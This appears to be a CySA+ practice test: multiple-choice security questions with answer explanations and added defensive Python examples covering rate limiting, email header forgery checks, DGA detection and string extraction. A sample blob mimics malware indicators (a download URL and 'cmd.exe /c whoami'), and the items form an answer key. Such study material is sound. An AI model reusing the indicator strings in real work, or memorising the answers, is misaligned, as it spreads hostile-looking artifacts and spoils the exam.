CySA 3 test question
48. A system that Carlos is responsible for has been experiencing consistent denial of service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem? A. IP-based blacklisting B. Dropping all SYN packets C. Using a connection rate or volume-limiting filter per IP D. Using a route-blocking filter that analyzes common LOIC routes
C. Since LOIC can leverage hundreds or thousands of hosts, limiting each connecting host to a connection rate and volume through filters like those provided by the iptables hashlimit match can help. IP-based blacklisting may work for smaller botnets, but it is difficult to maintain for larger attacks and may eventually block legitimate traffic. Dropping all SYN packets would prevent all TCP connections, and route-blocking filters are not a method used to prevent this type of attack. Two caveats apply to per-IP limits: many legitimate users behind one NAT gateway share a single source address, so the rate and burst must be generous enough for them, and a limit enforced on the victim's own firewall only helps while the link itself is not saturated. While he's setting up firewall rules, Carlos may also want to investigate a denial-of-service mitigation partner or service in case the attackers move to more advanced methods or do overwhelm his link.
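The per-source limit the answer describes, written out as an added example (this is not code from the book or from iptables): a token bucket keyed by source IP, which is the policy hashlimit enforces in the kernel, run over constructed traffic in which one LOIC-style host (203.0.113.7, a documentation address) opens 200 connections in a second while three ordinary clients open three each. Time and tokens are integers so the simulation is exact.

```python
from collections import defaultdict
from dataclasses import dataclass

# Added example, not from the book: a per-source-IP token bucket, the same
# policy the iptables hashlimit match enforces in the kernel
# (-m hashlimit --hashlimit-mode srcip --hashlimit-above 5/sec --hashlimit-burst 10).
# Time is kept in integer milliseconds and tokens in milli-tokens so the
# arithmetic is exact and the simulation below is reproducible.


@dataclass
class Bucket:
    tokens: int   # milli-tokens currently available
    last_ms: int  # timestamp of the last refill


class PerSourceLimiter:
    """Allow at most `rate_per_sec` new connections per second per source IP,
    with a `burst` allowance so a legitimate client that opens a handful of
    parallel connections is not penalised."""

    def __init__(self, rate_per_sec: int, burst: int):
        self.rate = rate_per_sec        # tokens/s is the same number as milli-tokens/ms
        self.cap = burst * 1000         # bucket size in milli-tokens
        self.buckets = {}               # src_ip -> Bucket

    def allow(self, src_ip: str, now_ms: int) -> bool:
        b = self.buckets.get(src_ip)
        if b is None:
            b = self.buckets[src_ip] = Bucket(tokens=self.cap, last_ms=now_ms)
        # Refill in proportion to elapsed time, never beyond the burst size.
        b.tokens = min(self.cap, b.tokens + (now_ms - b.last_ms) * self.rate)
        b.last_ms = now_ms
        if b.tokens >= 1000:            # one whole token buys one connection
            b.tokens -= 1000
            return True
        return False


def simulate(events, rate_per_sec=5, burst=10):
    """events: iterable of (timestamp_ms, src_ip) connection attempts.
    Returns {src_ip: (accepted, dropped)}."""
    limiter = PerSourceLimiter(rate_per_sec, burst)
    stats = defaultdict(lambda: [0, 0])
    for ts, ip in sorted(events):
        stats[ip][0 if limiter.allow(ip, ts) else 1] += 1
    return {ip: (acc, drop) for ip, (acc, drop) in stats.items()}


def build_sample_events():
    """Constructed traffic for one second: a LOIC-style source (203.0.113.7)
    opening 200 connections 5 ms apart, and three ordinary clients opening
    three connections each. All addresses are documentation ranges."""
    events = [(i * 5, "203.0.113.7") for i in range(200)]
    for n, ip in enumerate(["198.51.100.10", "198.51.100.11", "198.51.100.12"]):
        events += [(n * 100 + k * 50, ip) for k in range(3)]
    return events


if __name__ == "__main__":
    for ip, (accepted, dropped) in sorted(simulate(build_sample_events()).items()):
        print(f"{ip:15} accepted={accepted:3} dropped={dropped:3}")
```

With a 5/s rate and a burst of 10, the flooding host gets its first ten connections plus one more roughly every 200 ms (14 in the second, 186 dropped), while each ordinary client's three connections all pass. The same trade-off applies to the real hashlimit rule: the burst is what protects bursty but legitimate clients, and the rate is what caps a single abusive source.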
34. The ATT&CK framework defines which of the following as "the specifics behind how the adversary would attack the target"? A. The threat actor B. The targeting method C. The attack vector D. The organizational weakness
C. The ATT&CK framework defines the attack vector as the specifics behind how the adversary would attack the target. You don't have to memorize ATT&CK to pass the exam, but you should be prepared to encounter questions that you need to narrow down based on what knowledge you do have. Here you can rule out the threat actor and targeting method, and then decide between the attack vector and organizational weakness.
3. Abul wants to identify typical behavior on a Windows 10 system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time and performance over a period of time? A. sysmon B. sysgraph C. resmon D. resgraph
C. The Windows Resource Monitor application (resmon.exe) is a useful tool to both see real-time data and graph it over time, allowing Abul to watch for spikes and drops in usage that may indicate abnormal behavior. Sysmon is a Sysinternals add-on that logs process, network, and file events to the event log rather than a built-in utilization viewer, and sysgraph and resgraph do not exist.
15. Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred? A. The sudoers file B. /var/log/sudo C. /var/log/auth.log D. root's .bash_log
C. The auth.log file on Debian-derived Linux systems will capture sudo events; Red Hat-family systems write the same events to /var/log/secure, and on systemd hosts journald keeps a copy that journalctl can query. A knowledgeable attacker is likely to erase or modify the auth.log file, so Ian should make sure that the system is sending these events via syslog to a trusted secure host. The sudoers file contains details of which users can use sudo and what rights they have. There is not a file called /var/log/sudo, and root's .bash_log file might contain commands that root has run but won't have details of the sudo event—there's no reason for root to sudo to root!
67. Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11? A. iptables -A OUTPUT -d 10.24.31.11 -j DROP B. iptables -A INPUT -d 10.24.31.11 -j ADD C. iptables -block -host 10.24.31.11 -j DROP D. iptables -block -ip 10.24.31.11 -j ADD
A. Adding an iptables entry uses the -A flag to append a rule to a chain. Here, we can safely assume that OUTPUT is the outbound ruleset. The -d flag designates the destination IP address or subnet range, and -j specifies the action, DROP. Because -A appends to the end of the chain, an earlier ACCEPT rule that matches the same traffic would still win; -I inserts the rule at the top when the block needs to take precedence.
94. James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in? A. A sandbox B. A physical machine C. A container D. A DMARC
A. Automated malware analysis tools use a secure and instrumented sandbox environment to unpack and run malware so that they can observe and record actions taken by the malware. This is used to perform behavioral analysis as well as to generate file fingerprints and other elements of unique malware signatures.
Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.
101. Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use? A. A containerization tool B. A virtualization tool C. A sandbox tool D. A packet analyzer
C. The best option for Naomi is a dedicated sandbox tool like Sandboxie or a cloud sandbox service like ANY.RUN (app.any.run). They are designed to isolate the malware while providing instrumentation to capture and analyze the results of the malware execution. Manually building a virtualization environment is a possibility but requires a lot of work to instrument and build tools to analyze the malware. A containerization tool is best suited to app deployment, and a packet analyzer is useful for looking at network traffic.
26. While reviewing email headers, Saanvi notices an entry that reads: From: "John Smith, CIO" <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11]. Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com? A. John Smith's email was forwarded by someone at demo.com. B. John Smith's email was sent to someone at demo.com. C. The headers were forged to make it appear to have come from John Smith. D. The mail.demo.com server is a trusted email forwarding partner for example.com.
C. The most likely scenario in this circumstance is that the headers were forged to make the email appear to come from example.com, but the email was actually sent from mail.demo.com. Only the Received line added by Saanvi's own mail server can be trusted; every line below it was supplied by the sender and can itself be forged, which is why the SPF, DKIM, and DMARC results recorded in the Authentication-Results header should be checked alongside the raw Received chain.
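The header check from the answer, as an added example rather than code from the book: parse a message, take the earliest Received hop (the one closest to the sender), and compare the relay it names against the domain the From header claims. Both messages are constructed; the forged one mirrors the question (From claims example.com, originating relay mail.demo.com [10.74.19.11]), the second is what a consistent message looks like, and the receiving MX name mx.example.org, the IDs and the addresses are invented.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Added example, not from the book. Two constructed messages: FORGED_MESSAGE
# mirrors the question, CONSISTENT_MESSAGE is a control. Hostnames, addresses
# and queue IDs are invented; 192.0.2.25 is a documentation address.
FORGED_MESSAGE = """\
Received: from mail.demo.com (mail.demo.com [10.74.19.11])
\tby mx.example.org (Postfix) with ESMTP id 4F2A1C0B5;
\tTue, 1 Mar 2022 09:12:01 +0000
From: "John Smith, CIO" <john.smith@example.com>
To: saanvi@example.org
Subject: Urgent: wire transfer approval
Message-ID: <20220301091200.1234@mail.demo.com>

Please approve the attached transfer today.
"""

CONSISTENT_MESSAGE = """\
Received: from mx.example.org (localhost [127.0.0.1])
\tby mx.example.org (Postfix) with ESMTP id 9A1; Tue, 1 Mar 2022 09:15:00 +0000
Received: from smtp.example.com (smtp.example.com [192.0.2.25])
\tby mx.example.org (Postfix) with ESMTPS id 7B2; Tue, 1 Mar 2022 09:14:59 +0000
From: "John Smith, CIO" <john.smith@example.com>
To: saanvi@example.org
Subject: Quarterly report
Message-ID: <20220301091459.5678@smtp.example.com>

Attached as discussed.
"""

# "from <helo-name> (<reverse-dns> [<ip>])" as Postfix, Sendmail and Exim write it.
RECEIVED_FROM = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[^\]]+)\]\)", re.I)


def originating_hop(msg):
    """Each relay prepends its own Received header, so the last one in the
    list is the hop closest to the sender."""
    hops = msg.get_all("Received") or []
    if not hops:
        return None
    m = RECEIVED_FROM.search(" ".join(hops[-1].split()))   # unfold continuation lines
    return m.groupdict() if m else None


def domain_of(address_header):
    return parseaddr(address_header)[1].rpartition("@")[2].lower()


def in_domain(host, domain):
    host = (host or "").lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def assess(raw_message):
    """Compare the From domain with the relay named in the earliest Received hop."""
    msg = message_from_string(raw_message)
    claimed = domain_of(msg.get("From", ""))
    hop = originating_hop(msg)
    if hop is None:
        return {"claimed_domain": claimed, "relay": None,
                "verdict": "no parseable Received hop; cannot assess"}
    consistent = in_domain(hop["helo"], claimed) or in_domain(hop["rdns"], claimed)
    return {"claimed_domain": claimed, "relay": hop["helo"], "relay_ip": hop["ip"],
            "verdict": "relay consistent with From domain" if consistent
            else "From domain not served by originating relay: likely forged"}


if __name__ == "__main__":
    for raw in (FORGED_MESSAGE, CONSISTENT_MESSAGE):
        print(assess(raw))
```

The name-match is a triage heuristic, not proof: a legitimate third-party bulk sender or a forwarding service also fails it, and a sender who controls the relay can write any HELO name it likes. Treat only the Received line your own MX added as trustworthy, and let SPF, DKIM and DMARC (the Authentication-Results header) settle the question.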
64. Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this? A. Group Policy Object B. Organizational unit C. Active Directory forest D. Domain controller
A. Group Policy Objects (GPOs) are used to enforce security and configuration requirements within Active Directory. Active Directory forests and organizational units (OUs) are designed to organize systems and users hierarchically and do not directly allow security configurations, although GPOs may be applied to them. Domain controllers (DCs) are the servers that are responsible for providing Active Directory Domain Services to the organization and would be the point for applying and enforcing the GPO.
62. Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort? A. Implement logging B. Validate all inputs C. Parameterize queries D. Error and exception handling
A. Logging of application and server activity may provide valuable evidence during a forensic investigation. The other three controls listed are proactive controls designed to reduce the risk of an incident occurring and are less likely to directly provide information during a forensic investigation.
71. What type of attack does a network administrator need to be aware of when deploying port security? A. MAC address spoofing B. IP address spoofing C. Denial-of-service attacks D. ARP spoofing
A. MAC address spoofing or cloning will allow a system to easily bypass port security because port security only relies on MAC address verification to decide which systems can connect to a given network port.
7. Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances? A. 80 and 443 B. 22 and 80 C. 80 and 8088 D. 22 and 443
A. Most common HTTP traffic will go to port 80, and HTTPS traffic will go to 443. The next most common port for web traffic is 8080 (not the 8088 offered in option C), which would be a reasonable if significantly less common choice. While other ports may be in use, if you aren't expecting traffic to nonstandard HTTP and HTTPS ports you may want to investigate the traffic.
36. Lisa is aware that multiple members of her organization fell for a phishing attack. What attack vector should she worry about based on this? A. Compromised credentials B. Malicious insiders C. Ransomware D. Brute-force
A. Phishing attacks typically target credentials, so Lisa should focus on how to identify what credentials were exposed, how to prevent compromised credentials from causing problems, and how to reduce the likelihood of future successful phishing attacks. At the same time, she will need to monitor for use of the compromised credentials!
27. Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it? A. Spoofing MAC addresses B. Providing valid credentials C. Spoofing IP addresses D. Providing fake credentials
A. Port security relies on MAC addresses to filter which systems are allowed to connect to the port, which means that Corbin needs to consider how to prevent MAC spoofing.
84. What is the Security Content Automation Protocol used for? A. Assessing configuration compliance B. Testing for sensitive data in transit C. Testing for sensitive data at rest D. Assessing threat levels
A. SCAP (Security Content Automation Protocol) is a set of specifications that define how to exchange security automation content used to assess configuration compliance. It can also be used to detect vulnerable versions of software.
30. Users are reporting that inbound mail is not reaching their accounts. Chris believes that rule 1 should provide this access. The organization's SMTP server is located at 10.15.1.1. What component of this rule is incorrect? A. Protocol B. Source port C. Destination IP D. Destination port
A. The only error in this rule is the protocol. SMTP does run on port 25, and inbound connections should be accepted from any source port and any source IP address. The destination IP address (10.15.1.1) is correct. However, SMTP uses the TCP transport protocol, not UDP.
61. Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run? A. top B. ls -mem C. mem D. memstat
A. The top command provides a real-time view of the memory usage for a system on a per-process basis. The ls command lists files and has no memory option; mem was made up for this question; and memstat, where it is installed at all, is a third-party package for tallying memory use rather than a standard tool, so it won't give her the live per-process view top does. If you're not familiar with basic Linux commands like top, you should spend some time with a Linux system as you prepare for the CySA+ exam. A basic understanding of common commands can be very helpful.
92. Jennifer wants to search for terms including "CySA+" and all other variations of the text regardless of which letters may be capitalized. Which of the following commands will find all the terms that match what she is searching for in a text file named example.txt? A. grep -i cysa+ example.txt B. grep -uc CySA+ example.txt C. grep -case cysa+ example.txt D. grep example.txt cysa+
A. When you use grep with the -i flag, it performs a case-insensitive search. Neither -uc nor -case is a valid flag for this, and the search term comes before the filename, which means grep example.txt cysa+ will attempt to search a file named cysa+ for the example.txt phrase. One detail worth knowing: in grep's default basic regular expression syntax a bare + is a literal character, so cysa+ matches the literal text, but with -E or -P the + becomes a one-or-more quantifier and the pattern would need escaping (or -F for a fixed-string match).
38. What type of attack is a back-off algorithm intended to limit or prevent? A. Denial-of-service attacks B. Brute-force attacks C. Compromised credential-based attacks D. Trojans
B. Brute-force attacks rely on the ability to make multiple attempts to log in, access a service, or otherwise allow probes. A back-off algorithm can limit or prevent this by ensuring that only a limited number of attempts are possible before delays or a timed lockout occurs.
55. While analyzing a malware package, Ryan finds a list of hostnames shown here: earnestnessrealsitetest.com rvcxestnessrealsitetest.com hjbtestnessrealsitetest.com agekestnessrealsitetest.com sgjxestnessrealsitetest.com igjyestnessrealsitetest.com zxahestnessrealsitetest.com zfrpestnessrealsitetest.com hdquestnessrealsitetest.com umcuestnessrealsitetest.com hrbyestnessrealsitetest.com ysrtestnessrealsitetest.com kgteestnessrealsitetest.com hfsnestnessrealsitetest.com njxfestnessrealsitetest.com What has he likely found in the malware package? A. A RPG B. A DGA C. A SPT D. A FIN
B. Domain names like those listed are a common sign of a domain generation algorithm (DGA), which creates procedurally generated domain names for malware command and control hosts.
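What makes the list above look generated is not any single name but the family: fifteen labels that share one long suffix and differ only in a fixed-length, unpronounceable prefix. The following added example (my own heuristic, not code from the book or from any product) scores a list of hostnames on exactly those properties. SUSPECT is the list from the question; LEGIT is a constructed control set on an invented example.com zone.

```python
import os
import re

# Added example, not from the book: a family-level DGA heuristic.
SUSPECT = [
    "earnestnessrealsitetest.com", "rvcxestnessrealsitetest.com",
    "hjbtestnessrealsitetest.com", "agekestnessrealsitetest.com",
    "sgjxestnessrealsitetest.com", "igjyestnessrealsitetest.com",
    "zxahestnessrealsitetest.com", "zfrpestnessrealsitetest.com",
    "hdquestnessrealsitetest.com", "umcuestnessrealsitetest.com",
    "hrbyestnessrealsitetest.com", "ysrtestnessrealsitetest.com",
    "kgteestnessrealsitetest.com", "hfsnestnessrealsitetest.com",
    "njxfestnessrealsitetest.com",
]
# Constructed control set: ordinary service names on an invented zone.
LEGIT = ["mail.example.com", "login.example.com", "portal.example.com",
         "files.example.com", "calendar.example.com", "docs.example.com",
         "wiki.example.com", "help.example.com", "status.example.com",
         "video.example.com"]

CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxyz]{3,}")
VOWELS = set("aeiou")


def common_suffix(labels):
    """Longest suffix shared by every label: reverse, take the common prefix, reverse."""
    return os.path.commonprefix([label[::-1] for label in labels])[::-1]


def unpronounceable(text):
    """True when the text has no vowel at all or a run of three or more
    consonants; English-like labels rarely do, random letters often do."""
    letters = re.sub(r"[^a-z]", "", text)
    if not letters:
        return False
    return not (VOWELS & set(letters)) or bool(CONSONANT_RUN.search(letters))


def analyze_family(hostnames, min_siblings=5, min_fraction=0.5):
    """Score a set of hostnames as one family. Flags a DGA when enough siblings
    share a suffix, their variable prefixes are all the same length, and most
    of those prefixes look like random letters."""
    labels = [h.lower().rstrip(".") for h in hostnames]
    suffix = common_suffix(labels)
    prefixes = [label[: len(label) - len(suffix)].rstrip(".") for label in labels]
    fixed_len = len({len(p) for p in prefixes}) == 1
    flagged = sum(1 for p in prefixes if unpronounceable(p))
    fraction = flagged / len(prefixes) if prefixes else 0.0
    is_dga = len(labels) >= min_siblings and fixed_len and fraction >= min_fraction
    return {
        "suffix": suffix,
        "siblings": len(labels),
        "fixed_prefix_length": fixed_len,
        "unpronounceable": flagged,
        "fraction": round(fraction, 2),
        "verdict": "likely DGA" if is_dga else "no DGA pattern",
    }


if __name__ == "__main__":
    print(analyze_family(SUSPECT))
    print(analyze_family(LEGIT))
```

On the question's list the shared suffix is estnessrealsitetest.com, every prefix is four characters, and 11 of the 15 prefixes fail the pronounceability test, so the family is flagged; the control set has prefixes of varying length and none that fail. Single labels such as www would trip the consonant-run test on their own, which is why the verdict is made at the family level and not per name; in practice this kind of scoring is a triage step before checking the names against passive DNS and threat intelligence.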
5. How is integrated intelligence most commonly used in a firewall system? A. The firewall searches for new IPs to block and creates a STIX feed entry. B. The intelligence feed provides firewall rules that are implemented on the firewall in real time. C. Threat intelligence is used to provide IP information for rules. D. Named threat actors are blocked based on their threat level and resource model.
C. Threat intelligence feeds may be used to build rules; however, unlike option B, threat feeds typically aren't used to build rules in real time for firewall devices. Firewalls typically do not analyze their own logs and build STIX feed entries, nor do they know about threat actor names, resources, and threat levels.
57. Chris operates the point-of-sale (POS) network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the POS terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay compliant with PCI DSS and protect his vulnerable systems? A. Replace the Windows embedded point of sale terminals with standard Windows systems B. Build a custom operating system image that includes the patch C. Identify, implement, and document compensating controls D. Remove the POS terminals from the network until the vendor releases a patch
C. When a vulnerability exists and a patch has not been released or cannot be installed, compensating controls can provide appropriate protection. In the case of PCI DSS (and other compliance standards), documenting what compensating controls were put in place and making that documentation available is an important step for compliance.
89. Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks? A. The email's headers B. Embedded links in the email C. Attachments to the email D. The email signature block
D. Although the CySA+ exam includes email signatures in the list of items you may want to analyze, the same techniques are used to analyze the entire body of an email for malicious links and payloads. Header data is often checked against IP reputation databases and other checks that can help limit email from spam domains and known malicious senders. Signature blocks, however, are not typically a primary analysis tool.
82. Which of the following is not a limitation of a DNS sinkhole? A. They do not work on traffic sent directly to an IP address. B. They do not prevent malware from being executed. C. They can be bypassed using a hard-coded DNS server. D. They cannot block drive-by-download attempts.
D. DNS sinkholes can block many types of drive-by downloads by preventing systems from connecting to malicious sites. DNS sinkholes do have limitations: they only work when a DNS query occurs, which means that some malware uses IP addresses directly to avoid them. They also can't stop malware from being executed, and of course malware could use a hard-coded DNS server instead of the organization's DNS server.
11. Disabling unneeded services is an example of what type of activity? A. Threat modeling B. Incident remediation C. Proactive risk assessment D. Reducing the threat attack surface area
D. Disabling unneeded or risky services is an example of a strategy to reduce the attack surface area of a system or device. Threat modeling and proactive risk assessment are both activities that focus on preparation, rather than direct systems or technology action, and incident remediation might involve disabling a service, but there isn't enough information to know this for sure. What we do know for sure is that disabling unneeded services reduces the attack surface area for a system.
58. Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems? A. Enable host firewalls B. Install patches for those services C. Turn off the services for each appliance D. Place a network firewall between the devices and the rest of the network
D. Mateo's only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default, and since they are appliances they may not have host firewalls available to enable. They also often don't have patches available, and many appliances do not allow the services they provide to be disabled or modified.
32. Rule 4 is designed to allow SSH access from external networks to the server located at 10.15.1.3. Users are reporting that they cannot access the server. What is wrong? A. The protocol is incorrect. B. The rules are misordered. C. The destination port is incorrect. D. There is no error in the rule, and Chris should check for other issues.
D. Rule 4 is correctly designed to allow SSH access from external networks to the server located at 10.15.1.3. The error is not with the firewall rulebase, and Chris should search for other causes.
81. Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file? A. grep B. more C. less D. strings
D. The strings command extracts strings of printable characters from files, allowing Ben to quickly determine the contents of files. grep would require knowing what he is looking for, and both more and less will simply display the file, which is often not a useful strategy for binaries.
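What strings actually does is simple enough to write out, and doing so shows the two options analysts most often forget: printing the offset of each hit (strings -t x) so it can be found in a hex dump, and scanning for UTF-16LE "wide" strings (strings -el), which Windows binaries use and which the default ASCII scan misses entirely. This is an added example, not code from the book or from GNU binutils, run over a constructed byte string rather than a real binary.

```python
import re

# Added example, not from the book: a minimal `strings` that reports offsets
# and UTF-16LE strings. SAMPLE_BLOB is constructed; the URL and command are
# invented and 203.0.113.5 is a documentation address.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00"                        # "ELF" is only 3 printable bytes
    + b"\x8f\x90\x00\x01"
    + b"http://203.0.113.5/update.bin\x00"           # ASCII string, starts at offset 12
    + b"\x00\x13\x00"
    + "cmd.exe /c whoami".encode("utf-16-le")         # wide string, starts at offset 45
    + b"\x00\x00\xff\xfe"
    + b"ab\x00"                                        # too short to report
)


def extract_strings(data, min_len=4):
    """Return {'ascii': [(offset, text), ...], 'utf16le': [(offset, text), ...]}
    for every run of at least min_len printable characters (0x20-0x7e).
    A wide run is printable bytes each followed by a NUL, as UTF-16LE encodes ASCII."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return {
        "ascii": [(m.start(), m.group().decode("ascii"))
                  for m in ascii_run.finditer(data)],
        "utf16le": [(m.start(), m.group().decode("utf-16-le"))
                    for m in wide_run.finditer(data)],
    }


if __name__ == "__main__":
    for kind, hits in extract_strings(SAMPLE_BLOB).items():
        for offset, text in hits:
            print(f"{kind:8} {offset:#06x} {text}")
```

The default minimum of four characters is the same as the real tool's and is a trade-off: lowering it surfaces short markers such as ELF or MZ but also a great deal of noise from code bytes that happen to be printable. Packed or encrypted samples yield little either way, which is the cue to move to an unpacker or a sandbox.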
77. Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this? A. Reviewing the Message-ID to see if it has been incremented B. Checking for the In-Reply-To field C. Checking for the References field D. You cannot determine if a message was forwarded by analyzing the headers.
D. When an email is forwarded, the forwarding client creates a brand-new message with its own Message-ID; there is no "increment" to look for. The In-Reply-To and References fields are populated when a message is a reply, not when it is forwarded, so their presence or absence proves nothing either way. The best option that Charles has is to look for clues like a subject line that reads "FWD"—something that is easily changed.
49. Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity? A. Prepare B. Engage C. Presence D. Effect
D. While the infection may not cause the business to lose data, there is an effect, as systems must be restored and an investigation will need to be done to determine if data was exfiltrated in addition to being encrypted in place.
23. While reviewing Windows event logs for a Windows 10 system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue? A. The system was shut down. B. Another antivirus program has interfered with the scan. C. The user disabled the scan. D. The scan found a file it was unable to scan.
B. First, Kai should check the scan log to review the scan type and error code and look the code up on the Microsoft support site. The most likely cause from the list of provided answers is a conflict with another security product. While security practitioners often worry about malware on systems, a common cause of scan failures is a second installed antivirus package. If Kai doesn't find a second antivirus package installed, she should conduct a scan using another tool to see if malware may be the issue.
53. Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains seeing a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as? A. DNS masquerading B. DNS sinkholing C. DNS re-sequencing D. DNS hierarchy revision
B. Henry's implementation is a form of DNS sinkholing, which sends traffic to an alternate address that acts as the sinkhole for traffic that would otherwise go to a known bad domain.
100. Fred has been tasked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user's job? A. Time-based B. Rule-based C. Role-based D. Location-based
B. NAC solutions that implement employee job function-based criteria often use time-based controls to ensure that employees only have access when they are supposed to be working, role-based criteria due to their duties, and location-based rules to ensure that they only access networks where they work. Rule-based criteria typically focus on system health and configuration, thus focusing more on the computer or software than the user.
79. Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes too? A. Scheduled tasks B. Service replacement C. Service creation D. Autostart registry keys
B. Scheduled tasks, service creation, and autostart registry keys are all commonly found on Windows systems for legitimate purposes. Replacing services is far less common unless a known upgrade or patch has occurred.
1. James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred? A. The malware is polymorphic and is being identified as multiple viruses because it is changing. B. Different antimalware engines call the same malware package by different names. C. VirusTotal has likely misidentified the malware package, and this is a false positive. D. The malware contains multiple malware packages, resulting in the matches.
B. Sites like VirusTotal run multiple antimalware engines, which may use different names for malware packages. This can result in a malware package apparently matching multiple different infections.
73. Syd inputs the following command on a Linux system: #echo 127.0.0.1 example.com>> /etc/hosts What has she done? A. She has added the system to the allowed hosts file. B. She has routed traffic for the example.com domain to the local host. C. She has routed local host traffic to example.com. D. She has overwritten the hosts file and will have deleted all data except this entry.
B. Syd has appended an entry to the hosts file (>> appends; a single > would have overwritten it) that resolves the name example.com to her local address, so anything the system tries to send to example.com goes to itself. This is a useful technique to prevent a system from contacting a malicious host or domain, or to simply prevent a nontechnical user from visiting specific sites or domains. Two practical limits: hosts entries are exact-name matches, so www.example.com and other subdomains are unaffected unless they are listed too, and software that uses its own resolver or connects by IP address ignores the hosts file entirely.
25. Gabby executes the following command. What is she doing? ps -aux | grep apache2 | grep root A. Searching for all files owned by root named apache2 B. Checking currently running processes with the word apache2 and root both appearing in the output of top C. Shutting down all apache2 processes run by root D. There is not enough information to answer this question.
B. The ps utility lists currently running processes, and aux is a set of flags that control which processes are selected and what columns are shown. This output is then piped to grep, and all lines with the text apache2 will be selected. Then that list will be searched for the text root. This type of multiple piping can help quickly process large volumes of files and thousands or millions of lines of text. Two things to remember when reading the result: the grep apache2 process itself appears in the ps output and matches its own pattern, and grep root matches the word anywhere on the line, not only in the user column, so a process whose command line happens to contain "root" will also show up.
59. Michelle runs the following grep command. What text will it match? grep -i example *.txt A. All text files in the current directory with the word example in it B. All occurrences of the text example in all files in the current directory with a .txt extension C. All occurrences of the lowercase text example in all files in the current directory with a .txt extension D. All TXT files with a filename including the word example in the current directory and all subdirectories
B. This command uses the -i flag, which means it will ignore the case of the text. That means that grep will search all files with a .txt extension for any occurrences of example, regardless of the case or other letters around it.
17. What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory? A. How often the directory is accessed B. If files in the directory have changed C. If sensitive data was copied out of the directory D. Who has viewed files in the directory
B. Tripwire can monitor files and directories for changes, which means Gabby can use it to monitor for files in a directory that have changed. It will not tell you how often the directory is accessed, who viewed files, or if sensitive data was copied out of the directory.
13. Angela wants to prevent buffer overflow attacks on a Windows system. What two built-in technologies should she consider? A. The memory firewall and the stack guard B. ASLR and DEP C. ASLR and DLP D. The memory firewall and the buffer guard
B. Windows has support for both DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). These combine to help prevent buffer overflows from being exploited: DEP prevents memory pages tagged as data from being executed, and ASLR randomizes where Windows loads code and data so that an overflow cannot rely on known memory addresses. Neither stops the overflow itself; they make turning it into code execution much harder.
60. Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection? A. TLS B. VPN C. DLP D. FDE
C. A data loss prevention (DLP) system may be able to intercept and block unencrypted sensitive information leaving the web server, but it does not apply cryptography to web communications. Transport Layer Security (TLS) is the most direct approach to meeting Pranab's requirement, as it encrypts all communication to and from the web server. Virtual private networks (VPNs) may also be used to encrypt network traffic, adding a layer of security. Full-disk encryption (FDE) may also be used to protect information stored on the server in the event the disk is stolen.
88. Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this? A. CSV B. Flat file C. API D. Email
